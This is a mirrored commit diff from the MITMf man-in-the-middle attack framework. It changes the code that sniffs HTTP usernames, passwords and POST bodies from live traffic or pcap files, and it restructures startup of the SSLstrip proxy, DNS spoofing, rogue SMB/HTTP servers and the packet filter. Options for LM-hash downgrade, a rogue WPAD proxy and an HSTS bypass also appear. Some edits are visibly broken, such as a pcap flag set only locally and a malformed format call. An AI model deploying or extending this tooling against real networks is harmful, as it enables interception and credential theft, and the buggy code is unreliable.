mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
Fixed bug where Net-Creds wouldn't parse URL's and HTTP data when reading from pcap
Active packet filtering engine and proxy + servers are now mutually exclusive , you can only start one of them (iptable conflicts)
This commit is contained in:
parent
28fc081068
commit
986b2b851f
9 changed files with 179 additions and 160 deletions
|
@ -21,7 +21,7 @@ import pyinotify
|
||||||
import threading
|
import threading
|
||||||
from configobj import ConfigObj
|
from configobj import ConfigObj
|
||||||
|
|
||||||
class ConfigWatcher(pyinotify.ProcessEvent):
|
class ConfigWatcher(pyinotify.ProcessEvent, object):
|
||||||
|
|
||||||
@property
|
@property
|
||||||
def config(self):
|
def config(self):
|
||||||
|
|
200
core/netcreds.py
200
core/netcreds.py
|
@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
|
||||||
# Prone to false+ but prefer that to false-
|
# Prone to false+ but prefer that to false-
|
||||||
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
|
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
|
||||||
|
|
||||||
|
parsing_pcap = False
|
||||||
|
|
||||||
class NetCreds:
|
class NetCreds:
|
||||||
|
|
||||||
version = "1.0"
|
version = "1.0"
|
||||||
|
@ -51,15 +53,64 @@ class NetCreds:
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if "Interrupted system call" in e: pass
|
if "Interrupted system call" in e: pass
|
||||||
|
|
||||||
def start(self, interface, ip, pcap):
|
def start(self, interface, ip):
|
||||||
if pcap:
|
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
|
||||||
for pkt in PcapReader(pcap):
|
t.setDaemon(True)
|
||||||
pkt_parser(pkt)
|
t.start()
|
||||||
sys.exit()
|
|
||||||
else:
|
def parse_pcap(self, pcap):
|
||||||
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
|
parsing_pcap=True
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
for pkt in PcapReader(pcap):
|
||||||
|
pkt_parser(pkt)
|
||||||
|
|
||||||
|
sys.exit()
|
||||||
|
|
||||||
|
def frag_remover(ack, load):
|
||||||
|
'''
|
||||||
|
Keep the FILO OrderedDict of frag loads from getting too large
|
||||||
|
3 points of limit:
|
||||||
|
Number of ip_ports < 50
|
||||||
|
Number of acks per ip:port < 25
|
||||||
|
Number of chars in load < 5000
|
||||||
|
'''
|
||||||
|
global pkt_frag_loads
|
||||||
|
|
||||||
|
# Keep the number of IP:port mappings below 50
|
||||||
|
# last=False pops the oldest item rather than the latest
|
||||||
|
while len(pkt_frag_loads) > 50:
|
||||||
|
pkt_frag_loads.popitem(last=False)
|
||||||
|
|
||||||
|
# Loop through a deep copy dict but modify the original dict
|
||||||
|
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
||||||
|
for ip_port in copy_pkt_frag_loads:
|
||||||
|
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
||||||
|
# Keep 25 ack:load's per ip:port
|
||||||
|
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
||||||
|
pkt_frag_loads[ip_port].popitem(last=False)
|
||||||
|
|
||||||
|
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
||||||
|
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
||||||
|
for ip_port in copy_pkt_frag_loads:
|
||||||
|
# Keep the load less than 75,000 chars
|
||||||
|
for ack in copy_pkt_frag_loads[ip_port]:
|
||||||
|
# If load > 5000 chars, just keep the last 200 chars
|
||||||
|
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
||||||
|
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
|
||||||
|
|
||||||
|
def frag_joiner(ack, src_ip_port, load):
|
||||||
|
'''
|
||||||
|
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
||||||
|
'''
|
||||||
|
for ip_port in pkt_frag_loads:
|
||||||
|
if src_ip_port == ip_port:
|
||||||
|
if ack in pkt_frag_loads[src_ip_port]:
|
||||||
|
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
||||||
|
old_load = pkt_frag_loads[src_ip_port][ack]
|
||||||
|
concat_load = old_load + load
|
||||||
|
return OrderedDict([(ack, concat_load)])
|
||||||
|
|
||||||
|
return OrderedDict([(ack, load)])
|
||||||
|
|
||||||
def pkt_parser(pkt):
|
def pkt_parser(pkt):
|
||||||
'''
|
'''
|
||||||
|
@ -127,53 +178,7 @@ def pkt_parser(pkt):
|
||||||
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
|
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
|
||||||
|
|
||||||
# HTTP and other protocols that run on TCP + a raw load
|
# HTTP and other protocols that run on TCP + a raw load
|
||||||
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
|
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
|
||||||
|
|
||||||
def frag_remover(ack, load):
|
|
||||||
'''
|
|
||||||
Keep the FILO OrderedDict of frag loads from getting too large
|
|
||||||
3 points of limit:
|
|
||||||
Number of ip_ports < 50
|
|
||||||
Number of acks per ip:port < 25
|
|
||||||
Number of chars in load < 5000
|
|
||||||
'''
|
|
||||||
global pkt_frag_loads
|
|
||||||
|
|
||||||
# Keep the number of IP:port mappings below 50
|
|
||||||
# last=False pops the oldest item rather than the latest
|
|
||||||
while len(pkt_frag_loads) > 50:
|
|
||||||
pkt_frag_loads.popitem(last=False)
|
|
||||||
|
|
||||||
# Loop through a deep copy dict but modify the original dict
|
|
||||||
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
|
||||||
for ip_port in copy_pkt_frag_loads:
|
|
||||||
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
|
||||||
# Keep 25 ack:load's per ip:port
|
|
||||||
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
|
||||||
pkt_frag_loads[ip_port].popitem(last=False)
|
|
||||||
|
|
||||||
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
|
||||||
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
|
||||||
for ip_port in copy_pkt_frag_loads:
|
|
||||||
# Keep the load less than 75,000 chars
|
|
||||||
for ack in copy_pkt_frag_loads[ip_port]:
|
|
||||||
# If load > 5000 chars, just keep the last 200 chars
|
|
||||||
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
|
||||||
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
|
|
||||||
|
|
||||||
def frag_joiner(ack, src_ip_port, load):
|
|
||||||
'''
|
|
||||||
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
|
||||||
'''
|
|
||||||
for ip_port in pkt_frag_loads:
|
|
||||||
if src_ip_port == ip_port:
|
|
||||||
if ack in pkt_frag_loads[src_ip_port]:
|
|
||||||
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
|
||||||
old_load = pkt_frag_loads[src_ip_port][ack]
|
|
||||||
concat_load = old_load + load
|
|
||||||
return OrderedDict([(ack, concat_load)])
|
|
||||||
|
|
||||||
return OrderedDict([(ack, load)])
|
|
||||||
|
|
||||||
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
|
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
|
||||||
'''
|
'''
|
||||||
|
@ -530,14 +535,14 @@ def irc_logins(full_load, pkt):
|
||||||
msg = 'IRC pass: %s' % pass_search2.group(1)
|
msg = 'IRC pass: %s' % pass_search2.group(1)
|
||||||
return msg
|
return msg
|
||||||
|
|
||||||
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
|
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
|
||||||
'''
|
'''
|
||||||
Pull out pertinent info from the parsed HTTP packet data
|
Pull out pertinent info from the parsed HTTP packet data
|
||||||
'''
|
'''
|
||||||
user_passwd = None
|
user_passwd = None
|
||||||
http_url_req = None
|
http_url_req = None
|
||||||
method = None
|
method = None
|
||||||
http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
|
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
|
||||||
http_line, header_lines, body = parse_http_load(full_load, http_methods)
|
http_line, header_lines, body = parse_http_load(full_load, http_methods)
|
||||||
headers = headers_to_dict(header_lines)
|
headers = headers_to_dict(header_lines)
|
||||||
if 'host' in headers:
|
if 'host' in headers:
|
||||||
|
@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
|
||||||
else:
|
else:
|
||||||
host = ''
|
host = ''
|
||||||
|
|
||||||
#if http_line != None:
|
if parsing_pcap is True:
|
||||||
# method, path = parse_http_line(http_line, http_methods)
|
|
||||||
# http_url_req = get_http_url(method, host, path, headers)
|
|
||||||
#if http_url_req != None:
|
|
||||||
#printer(src_ip_port, None, http_url_req)
|
|
||||||
|
|
||||||
# Print search terms
|
if http_line != None:
|
||||||
searched = get_http_searches(http_url_req, body, host)
|
method, path = parse_http_line(http_line, http_methods)
|
||||||
if searched:
|
http_url_req = get_http_url(method, host, path, headers)
|
||||||
printer(src_ip_port, dst_ip_port, searched)
|
if http_url_req != None:
|
||||||
|
if verbose == False:
|
||||||
|
if len(http_url_req) > 98:
|
||||||
|
http_url_req = http_url_req[:99] + '...'
|
||||||
|
printer(src_ip_port, None, http_url_req)
|
||||||
|
|
||||||
#We dont need this cause its being taking care of by the proxy
|
# Print search terms
|
||||||
|
searched = get_http_searches(http_url_req, body, host)
|
||||||
#Print user/pwds
|
if searched:
|
||||||
#if body != '':
|
printer(src_ip_port, dst_ip_port, searched)
|
||||||
# user_passwd = get_login_pass(body)
|
|
||||||
# if user_passwd != None:
|
|
||||||
# try:
|
|
||||||
# http_user = user_passwd[0].decode('utf8')
|
|
||||||
# http_pass = user_passwd[1].decode('utf8')
|
|
||||||
# # Set a limit on how long they can be prevent false+
|
|
||||||
# if len(http_user) > 75 or len(http_pass) > 75:
|
|
||||||
# return
|
|
||||||
# user_msg = 'HTTP username: %s' % http_user
|
|
||||||
# printer(src_ip_port, dst_ip_port, user_msg)
|
|
||||||
# pass_msg = 'HTTP password: %s' % http_pass
|
|
||||||
# printer(src_ip_port, dst_ip_port, pass_msg)
|
|
||||||
# except UnicodeDecodeError:
|
|
||||||
# pass
|
|
||||||
|
|
||||||
# Print POST loads
|
# Print user/pwds
|
||||||
# ocsp is a common SSL post load that's never interesting
|
if body != '':
|
||||||
#if method == 'POST' and 'ocsp.' not in host:
|
user_passwd = get_login_pass(body)
|
||||||
# try:
|
if user_passwd != None:
|
||||||
# msg = 'POST load: %s' % body.encode('utf8')
|
try:
|
||||||
# printer(src_ip_port, None, msg)
|
http_user = user_passwd[0].decode('utf8')
|
||||||
# except UnicodeDecodeError:
|
http_pass = user_passwd[1].decode('utf8')
|
||||||
# pass
|
# Set a limit on how long they can be prevent false+
|
||||||
|
if len(http_user) > 75 or len(http_pass) > 75:
|
||||||
|
return
|
||||||
|
user_msg = 'HTTP username: %s' % http_user
|
||||||
|
printer(src_ip_port, dst_ip_port, user_msg)
|
||||||
|
pass_msg = 'HTTP password: %s' % http_pass
|
||||||
|
printer(src_ip_port, dst_ip_port, pass_msg)
|
||||||
|
except UnicodeDecodeError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# Print POST loads
|
||||||
|
# ocsp is a common SSL post load that's never interesting
|
||||||
|
if method == 'POST' and 'ocsp.' not in host:
|
||||||
|
try:
|
||||||
|
if verbose == False and len(body) > 99:
|
||||||
|
# If it can't decode to utf8 we're probably not interested in it
|
||||||
|
msg = 'POST load: %s...' % body[:99].encode('utf8')
|
||||||
|
else:
|
||||||
|
msg = 'POST load: %s' % body.encode('utf8')
|
||||||
|
printer(src_ip_port, None, msg)
|
||||||
|
except UnicodeDecodeError:
|
||||||
|
pass
|
||||||
|
|
||||||
# Kerberos over TCP
|
# Kerberos over TCP
|
||||||
decoded = Decode_Ip_Packet(str(pkt)[14:])
|
decoded = Decode_Ip_Packet(str(pkt)[14:])
|
||||||
|
@ -904,7 +916,7 @@ def get_login_pass(body):
|
||||||
|
|
||||||
def printer(src_ip_port, dst_ip_port, msg):
|
def printer(src_ip_port, dst_ip_port, msg):
|
||||||
if dst_ip_port != None:
|
if dst_ip_port != None:
|
||||||
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
|
print_str = '[{} > {}] {}'.format((src_ip_port, dst_ip_port, msg))
|
||||||
# All credentials will have dst_ip_port, URLs will not
|
# All credentials will have dst_ip_port, URLs will not
|
||||||
|
|
||||||
log.info("{}".format(print_str))
|
log.info("{}".format(print_str))
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
import threading
|
|
||||||
|
|
||||||
from core.utils import set_ip_forwarding, iptables
|
from core.utils import set_ip_forwarding, iptables
|
||||||
from core.logger import logger
|
from core.logger import logger
|
||||||
from scapy.all import *
|
from scapy.all import *
|
||||||
|
@ -21,9 +19,7 @@ class PacketFilter:
|
||||||
self.nfqueue = NetfilterQueue()
|
self.nfqueue = NetfilterQueue()
|
||||||
self.nfqueue.bind(1, self.modify)
|
self.nfqueue.bind(1, self.modify)
|
||||||
|
|
||||||
t = threading.Thread(name='packetparser', target=self.nfqueue.run)
|
self.nfqueue.run()
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
|
|
||||||
def modify(self, pkt):
|
def modify(self, pkt):
|
||||||
#log.debug("Got packet")
|
#log.debug("Got packet")
|
||||||
|
|
|
@ -108,9 +108,10 @@ class ProxyPlugins:
|
||||||
log.debug("hooking {}()".format(fname))
|
log.debug("hooking {}()".format(fname))
|
||||||
#calls any plugin that has this hook
|
#calls any plugin that has this hook
|
||||||
try:
|
try:
|
||||||
for f in self.plugin_mthds[fname]:
|
if self.plugin_mthds:
|
||||||
a = f(**args)
|
for f in self.plugin_mthds[fname]:
|
||||||
if a != None: args = a
|
a = f(**args)
|
||||||
|
if a != None: args = a
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
||||||
log.error("Exception occurred in hooked function")
|
log.error("Exception occurred in hooked function")
|
||||||
|
|
113
mitmf.py
113
mitmf.py
|
@ -52,7 +52,7 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
|
||||||
#add MITMf options
|
#add MITMf options
|
||||||
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
||||||
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
||||||
sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
|
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
|
||||||
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
|
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
|
||||||
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
|
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
|
||||||
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
|
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
|
||||||
|
@ -73,6 +73,15 @@ options = parser.parse_args()
|
||||||
#Set the log level
|
#Set the log level
|
||||||
logger().log_level = logging.__dict__[options.log_level.upper()]
|
logger().log_level = logging.__dict__[options.log_level.upper()]
|
||||||
|
|
||||||
|
from core.logger import logger
|
||||||
|
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
|
log = logger().setup_logger("MITMf", formatter)
|
||||||
|
|
||||||
|
from core.netcreds import NetCreds
|
||||||
|
|
||||||
|
if options.read_pcap:
|
||||||
|
NetCreds().parse_pcap(options.read_pcap)
|
||||||
|
|
||||||
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
|
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
|
||||||
from core.utils import get_ip, get_mac, shutdown
|
from core.utils import get_ip, get_mac, shutdown
|
||||||
options.ip = get_ip(options.interface)
|
options.ip = get_ip(options.interface)
|
||||||
|
@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)
|
||||||
|
|
||||||
settings.Config.populate(options)
|
settings.Config.populate(options)
|
||||||
|
|
||||||
from core.logger import logger
|
|
||||||
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
|
||||||
log = logger().setup_logger("MITMf", formatter)
|
|
||||||
|
|
||||||
log.debug("MITMf started: {}".format(sys.argv))
|
log.debug("MITMf started: {}".format(sys.argv))
|
||||||
|
|
||||||
#Start Net-Creds
|
#Start Net-Creds
|
||||||
from core.netcreds import NetCreds
|
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
|
||||||
NetCreds().start(options.interface, options.ip, options.read_pcap)
|
|
||||||
|
NetCreds().start(options.interface, options.ip)
|
||||||
|
print "|"
|
||||||
|
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
||||||
|
|
||||||
from core.sslstrip.CookieCleaner import CookieCleaner
|
|
||||||
from core.proxyplugins import ProxyPlugins
|
from core.proxyplugins import ProxyPlugins
|
||||||
from core.sslstrip.StrippingProxy import StrippingProxy
|
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
|
||||||
|
|
||||||
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
|
||||||
URLMonitor.getInstance().setCaching(options.preserve_cache)
|
|
||||||
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
|
||||||
|
|
||||||
strippingFactory = http.HTTPFactory(timeout=10)
|
|
||||||
strippingFactory.protocol = StrippingProxy
|
|
||||||
|
|
||||||
reactor.listenTCP(options.listen_port, strippingFactory)
|
|
||||||
|
|
||||||
ProxyPlugins().all_plugins = plugins
|
ProxyPlugins().all_plugins = plugins
|
||||||
|
|
||||||
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
|
|
||||||
for plugin in plugins:
|
for plugin in plugins:
|
||||||
|
|
||||||
#load only the plugins that have been called at the command line
|
#load only the plugins that have been called at the command line
|
||||||
|
@ -126,48 +120,63 @@ for plugin in plugins:
|
||||||
for line in xrange(0, len(plugin.tree_info)):
|
for line in xrange(0, len(plugin.tree_info)):
|
||||||
print "| |_ {}".format(plugin.tree_info.pop())
|
print "| |_ {}".format(plugin.tree_info.pop())
|
||||||
|
|
||||||
plugin.reactor(strippingFactory)
|
|
||||||
plugin.start_config_watch()
|
plugin.start_config_watch()
|
||||||
|
|
||||||
print "|"
|
|
||||||
print "|_ Sergio-Proxy v0.2.1 online"
|
|
||||||
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
|
|
||||||
print "|"
|
|
||||||
|
|
||||||
if options.filter:
|
if options.filter:
|
||||||
from core.packetfilter import PacketFilter
|
from core.packetfilter import PacketFilter
|
||||||
pfilter = PacketFilter(options.filter)
|
pfilter = PacketFilter(options.filter)
|
||||||
pfilter.start()
|
|
||||||
print "|_ PacketFilter online"
|
print "|_ PacketFilter online"
|
||||||
print "| |_ Applying filter {} to incoming packets".format(options.filter)
|
print " |_ Applying filter {} to incoming packets".format(options.filter)
|
||||||
|
try:
|
||||||
|
pfilter.start()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
pfilter.stop()
|
||||||
|
shutdown()
|
||||||
|
|
||||||
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
else:
|
||||||
|
from core.sslstrip.CookieCleaner import CookieCleaner
|
||||||
|
from core.sslstrip.StrippingProxy import StrippingProxy
|
||||||
|
from core.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
#Start mitmf-api
|
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
||||||
from core.mitmfapi import mitmfapi
|
URLMonitor.getInstance().setCaching(options.preserve_cache)
|
||||||
print "|_ MITMf-API online"
|
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
||||||
mitmfapi().start()
|
|
||||||
|
|
||||||
#Start the HTTP Server
|
strippingFactory = http.HTTPFactory(timeout=10)
|
||||||
from core.servers.HTTP import HTTP
|
strippingFactory.protocol = StrippingProxy
|
||||||
HTTP().start()
|
|
||||||
print "|_ HTTP server online"
|
|
||||||
|
|
||||||
#Start DNSChef
|
reactor.listenTCP(options.listen_port, strippingFactory)
|
||||||
from core.servers.DNS import DNSChef
|
|
||||||
DNSChef().start()
|
|
||||||
print "|_ DNSChef v{} online".format(DNSChef.version)
|
|
||||||
|
|
||||||
#Start the SMB server
|
for plugin in plugins:
|
||||||
from core.servers.SMB import SMB
|
if vars(options)[plugin.optname] is True:
|
||||||
SMB().start()
|
plugin.reactor(strippingFactory)
|
||||||
print "|_ SMB server online\n"
|
|
||||||
|
|
||||||
#start the reactor
|
print "|_ Sergio-Proxy v0.2.1 online"
|
||||||
reactor.run()
|
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
|
||||||
print "\n"
|
|
||||||
|
|
||||||
if options.filter:
|
#Start mitmf-api
|
||||||
pfilter.stop()
|
from core.mitmfapi import mitmfapi
|
||||||
|
print "|"
|
||||||
|
print "|_ MITMf-API online"
|
||||||
|
mitmfapi().start()
|
||||||
|
|
||||||
shutdown()
|
#Start the HTTP Server
|
||||||
|
from core.servers.HTTP import HTTP
|
||||||
|
HTTP().start()
|
||||||
|
print "|_ HTTP server online"
|
||||||
|
|
||||||
|
#Start DNSChef
|
||||||
|
from core.servers.DNS import DNSChef
|
||||||
|
DNSChef().start()
|
||||||
|
print "|_ DNSChef v{} online".format(DNSChef.version)
|
||||||
|
|
||||||
|
#Start the SMB server
|
||||||
|
from core.servers.SMB import SMB
|
||||||
|
SMB().start()
|
||||||
|
print "|_ SMB server online\n"
|
||||||
|
|
||||||
|
#start the reactor
|
||||||
|
reactor.run()
|
||||||
|
print "\n"
|
||||||
|
|
||||||
|
shutdown()
|
|
@ -31,6 +31,7 @@ class Plugin(ConfigWatcher):
|
||||||
|
|
||||||
def __init__(self, parser):
|
def __init__(self, parser):
|
||||||
'''Passed the options namespace'''
|
'''Passed the options namespace'''
|
||||||
|
|
||||||
if self.desc:
|
if self.desc:
|
||||||
sgroup = parser.add_argument_group(self.name, self.desc)
|
sgroup = parser.add_argument_group(self.name, self.desc)
|
||||||
else:
|
else:
|
||||||
|
|
|
@ -91,5 +91,5 @@ class Responder(Plugin):
|
||||||
options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
|
options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
|
||||||
options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
|
options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
|
||||||
options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
|
options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
|
||||||
options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
|
||||||
options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
||||||
|
|
|
@ -70,7 +70,7 @@ class Spoof(Plugin):
|
||||||
|
|
||||||
if options.dns:
|
if options.dns:
|
||||||
self.tree_info.append('DNS spoofing enabled')
|
self.tree_info.append('DNS spoofing enabled')
|
||||||
if iptables().dns is False:
|
if iptables().dns is False and options.filter is False:
|
||||||
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
||||||
|
|
||||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
||||||
|
@ -78,7 +78,7 @@ class Spoof(Plugin):
|
||||||
|
|
||||||
set_ip_forwarding(1)
|
set_ip_forwarding(1)
|
||||||
|
|
||||||
if iptables().http is False:
|
if iptables().http is False and options.filter is False:
|
||||||
iptables().HTTP(options.listen_port)
|
iptables().HTTP(options.listen_port)
|
||||||
|
|
||||||
for protocol in self.protocol_instances:
|
for protocol in self.protocol_instances:
|
||||||
|
|
|
@ -33,7 +33,7 @@ class SSLstripPlus(Plugin):
|
||||||
from core.servers.DNS import DNSChef
|
from core.servers.DNS import DNSChef
|
||||||
from core.utils import iptables
|
from core.utils import iptables
|
||||||
|
|
||||||
if iptables().dns is False:
|
if iptables().dns is False and options.filter is False:
|
||||||
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
||||||
|
|
||||||
URLMonitor.getInstance().setHstsBypass()
|
URLMonitor.getInstance().setHstsBypass()
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue